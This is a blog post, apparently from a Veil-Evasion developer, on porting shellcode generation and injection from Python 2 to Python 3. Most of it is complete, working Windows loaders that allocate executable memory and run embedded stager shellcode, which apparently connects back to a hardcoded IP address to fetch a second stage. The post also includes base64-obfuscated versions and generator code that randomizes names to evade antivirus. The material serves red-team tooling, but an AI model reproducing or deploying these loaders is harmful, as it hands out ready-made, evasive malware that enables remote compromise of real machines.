Shellcode Generation, Manipulation, and Injection in Python 3

It’s no secret that I’ve been working on updating Veil and will soon be releasing Veil 3.0. In the process, I’ve learned quite a bit about Python 2 and 3. Veil-Evasion was developed in Python 2 and after attempting to recreate some of the same capabilities in Python 3, I’ve learned how “loose” Python 2 can be. We were able to get away with various commands where Python 3 explicitly requires us to define what is being done.

Want to see how shellcode injection works in Python 2.0? Here’s a sample Python 2 flat script which includes no obfuscation:

EUPnBcpNWMwGi = bytearray('\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\xc0\xa8\xa2\x91\x68\x02\x00\x21\xe3\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3')
import ctypes as ZKWXnIdQAuP
VjdMidBttQlbLnR = ZKWXnIdQAuP.windll.kernel32.VirtualAlloc(ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(len(EUPnBcpNWMwGi)),ZKWXnIdQAuP.c_int(0x3000),ZKWXnIdQAuP.c_int(0x40))
WgHYTWhElnnZ = (ZKWXnIdQAuP.c_char * len(EUPnBcpNWMwGi)).from_buffer(EUPnBcpNWMwGi)
ZKWXnIdQAuP.windll.kernel32.RtlMoveMemory(ZKWXnIdQAuP.c_int(VjdMidBttQlbLnR),WgHYTWhElnnZ,ZKWXnIdQAuP.c_int(len(EUPnBcpNWMwGi)))
IaoYNg = ZKWXnIdQAuP.windll.kernel32.CreateThread(ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(VjdMidBttQlbLnR),ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.pointer(ZKWXnIdQAuP.c_int(0)))
ZKWXnIdQAuP.windll.kernel32.WaitForSingleObject(ZKWXnIdQAuP.c_int(IaoYNg),ZKWXnIdQAuP.c_int(-1))

And now, here’s the same script written for Python 3:

import ctypes as bDlDmsfMyuV
miiJDEKLsxLjbM = b'\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\xc0\xa8\xa2\x91\x68\x02\x00\x21\xe3\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'
wiseZERld = bDlDmsfMyuV.windll.kernel32.VirtualAlloc(bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(len(miiJDEKLsxLjbM)),bDlDmsfMyuV.c_int(0x3000),bDlDmsfMyuV.c_int(0x40))
bDlDmsfMyuV.windll.kernel32.RtlMoveMemory(bDlDmsfMyuV.c_int(wiseZERld),miiJDEKLsxLjbM,bDlDmsfMyuV.c_int(len(miiJDEKLsxLjbM)))
CVXWRcjqxL = bDlDmsfMyuV.windll.kernel32.CreateThread(bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(wiseZERld),bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.pointer(bDlDmsfMyuV.c_int(0)))
bDlDmsfMyuV.windll.kernel32.WaitForSingleObject(bDlDmsfMyuV.c_int(CVXWRcjqxL),bDlDmsfMyuV.c_int(-1))

You can see there is a difference in how the shellcode is being handled. In Python 2, I’m storing the shellcode as a bytearray, vs. Python 3 it’s stored as bytes. This isn’t a huge difference, but a larger change can be seen when manipulating shellcode, such as storing it in a base64 decoding script.

This is how I am able to generate shellcode and base64 encode it to be decoded at runtime in a script in Python 2:

# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)

# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)

# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()

PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

if self.required_options["USE_PYHERION"][0].lower() == "y":
    PayloadCode = encryption.pyherion(PayloadCode)

return PayloadCode

At line 2, we’re receiving a string which essentially contains shellcode similar to ‘\x41\x7d\x00\x0a…’. This string is encoded, and then stored in output payload code. The code which this module creates looks like this:

import ctypes as rLkdwnPpzMBnJr
import base64
IesGKFkNFMC = "XHhmY1x4ZThceDg2XHgwMFx4MDBceDAwXHg2MFx4ODlceGU1XHgzMVx4ZDJceDY0XHg4Ylx4NTJceDMwXHg4Ylx4NTJceDBjXHg4Ylx4NTJceDE0XHg4Ylx4NzJceDI4XHgwZlx4YjdceDRhXHgyNlx4MzFceGZmXHgzMVx4YzBceGFjXHgzY1x4NjFceDdjXHgwMlx4MmNceDIwXHhjMVx4Y2ZceDBkXHgwMVx4YzdceGUyXHhmMFx4NTJceDU3XHg4Ylx4NTJceDEwXHg4Ylx4NDJceDNjXHg4Ylx4NGNceDEwXHg3OFx4ZTNceDRhXHgwMVx4ZDFceDUxXHg4Ylx4NTlceDIwXHgwMVx4ZDNceDhiXHg0OVx4MThceGUzXHgzY1x4NDlceDhiXHgzNFx4OGJceDAxXHhkNlx4MzFceGZmXHgzMVx4YzBceGFjXHhjMVx4Y2ZceDBkXHgwMVx4YzdceDM4XHhlMFx4NzVceGY0XHgwM1x4N2RceGY4XHgzYlx4N2RceDI0XHg3NVx4ZTJceDU4XHg4Ylx4NThceDI0XHgwMVx4ZDNceDY2XHg4Ylx4MGNceDRiXHg4Ylx4NThceDFjXHgwMVx4ZDNceDhiXHgwNFx4OGJceDAxXHhkMFx4ODlceDQ0XHgyNFx4MjRceDViXHg1Ylx4NjFceDU5XHg1YVx4NTFceGZmXHhlMFx4NThceDVmXHg1YVx4OGJceDEyXHhlYlx4ODlceDVkXHg2OFx4MzNceDMyXHgwMFx4MDBceDY4XHg3N1x4NzNceDMyXHg1Zlx4NTRceDY4XHg0Y1x4NzdceDI2XHgwN1x4ZmZceGQ1XHhiOFx4OTBceDAxXHgwMFx4MDBceDI5XHhjNFx4NTRceDUwXHg2OFx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg1MFx4NTBceDQwXHg1MFx4NDBceDUwXHg2OFx4ZWFceDBmXHhkZlx4ZTBceGZmXHhkNVx4OTdceDZhXHgwOVx4NjhceGMwXHhhOFx4YTJceDkxXHg2OFx4MDJceDAwXHgyMVx4ZTNceDg5XHhlNlx4NmFceDEwXHg1Nlx4NTdceDY4XHg5OVx4YTVceDc0XHg2MVx4ZmZceGQ1XHg4NVx4YzBceDc0XHgwY1x4ZmZceDRlXHgwOFx4NzVceGVjXHg2OFx4ZjBceGI1XHhhMlx4NTZceGZmXHhkNVx4NmFceDAwXHg2YVx4MDRceDU2XHg1N1x4NjhceDAyXHhkOVx4YzhceDVmXHhmZlx4ZDVceDhiXHgzNlx4NmFceDQwXHg2OFx4MDBceDEwXHgwMFx4MDBceDU2XHg2YVx4MDBceDY4XHg1OFx4YTRceDUzXHhlNVx4ZmZceGQ1XHg5M1x4NTNceDZhXHgwMFx4NTZceDUzXHg1N1x4NjhceDAyXHhkOVx4YzhceDVmXHhmZlx4ZDVceDAxXHhjM1x4MjlceGM2XHg4NVx4ZjZceDc1XHhlY1x4YzM="
CnnDRU = bytearray(IesGKFkNFMC.decode('base64','strict').decode("string_escape"))
usGGTaLShwINu = rLkdwnPpzMBnJr.windll.kernel32.VirtualAlloc(rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(len(CnnDRU)),rLkdwnPpzMBnJr.c_int(0x3000),rLkdwnPpzMBnJr.c_int(0x40))
TaEkbM = (rLkdwnPpzMBnJr.c_char * len(CnnDRU)).from_buffer(CnnDRU)
rLkdwnPpzMBnJr.windll.kernel32.RtlMoveMemory(rLkdwnPpzMBnJr.c_int(usGGTaLShwINu),TaEkbM,rLkdwnPpzMBnJr.c_int(len(CnnDRU)))
TuQYnf = rLkdwnPpzMBnJr.windll.kernel32.CreateThread(rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(usGGTaLShwINu),rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.pointer(rLkdwnPpzMBnJr.c_int(0)))
rLkdwnPpzMBnJr.windll.kernel32.WaitForSingleObject(rLkdwnPpzMBnJr.c_int(TuQYnf),rLkdwnPpzMBnJr.c_int(-1))

This script decodes the base64 encoded string (the shellcode), and then string escapes the shellcode. After that, the escaped shellcode is injected into memory and run. Python 2 makes this fairly simple to do, Python 3, is a little more strict with the datatypes that are used.

For example, this is how I am generating shellcode and encoding it prior to embedding it within a script in Python 3:

# Generate the shellcode
Shellcode = self.shellcode.generate(self.cli_opts)
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')

# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')

payload_code = 'import ctypes as ' + randctypes + '\n'
payload_code += 'import base64\n'
payload_code += ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

Immediately there’s a difference with how shellcode generation and manipulation is handled. In this case, line 2 still receives the shellcode as a string similar to ‘\x41\x7d\x00\x0a…’, but you can’t base64 encode a string in Python 3, it requires input to be in the form of bytes. Unfortunately, .encode() on the shellcode doesn’t properly encode the shellcode for injection later on in the script. It took a while, but with the help of @raikiasec, we were able to figure out that encoding shellcode with latin-1 formatting (.encode(‘latin-1’)) allowed the string shellcode to be properly encoded.

Obviously, that wasn’t the only step that needs to be taken. After encoding in ‘latin-1’ format, the shellcode needs to be unicode escaped, and then re-encoded in latin-1 to return it to a byte format (hint: every time you .encode() something, you convert from a string to bytes. Each time you .decode() something, you convert from bytes to a string). The final latin-1 encoding is all that is needed, and then the shellcode is base64 encoded. Beyond that, Base64 encoding returns bytes, so the bytes output needs to be decoded as ascii, and then stored in the output Python script. ¬†Once this is done, it creates a script similar to below:

import ctypes as AKkkiwvmOTZmuXU
import base64
mMgzKuJ = base64.b64decode("/OiGAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8i0wQeONKAdFRi1kgAdOLSRjjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ldaDMyAABod3MyX1RoTHcmB//VuJABAAApxFRQaCmAawD/1VBQUFBAUEBQaOoP3+D/1ZdqCWjAqKKRaAIAIeOJ5moQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGhfZ17MM=")
COZaAf = AKkkiwvmOTZmuXU.windll.kernel32.VirtualAlloc(AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(len(mMgzKuJ)),AKkkiwvmOTZmuXU.c_int(0x3000),AKkkiwvmOTZmuXU.c_int(0x40))
AKkkiwvmOTZmuXU.windll.kernel32.RtlMoveMemory(AKkkiwvmOTZmuXU.c_int(COZaAf),mMgzKuJ,AKkkiwvmOTZmuXU.c_int(len(mMgzKuJ)))
WzFChtFNp = AKkkiwvmOTZmuXU.windll.kernel32.CreateThread(AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(COZaAf),AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.pointer(AKkkiwvmOTZmuXU.c_int(0)))
AKkkiwvmOTZmuXU.windll.kernel32.WaitForSingleObject(AKkkiwvmOTZmuXU.c_int(WzFChtFNp),AKkkiwvmOTZmuXU.c_int(-1))

The hardest concept for me to grasp was learning the proper encoding/decoding format that the shellcode needs to be in for the different types of manipulation that I would perform on the shellcode (base64 encoding, letter substitution, encryption, etc.). Hopefully by giving some code examples here, this can help anyone else that is looking into using Python 3 to manipulate shellcode, inject it into memory, or more.

If there’s a better way to do the above, or if you have any questions, don’t hesitate to send a message my way! Otherwise, be sure to check out Veil 3’s release at NullCon and you’ll have plenty of example to look at!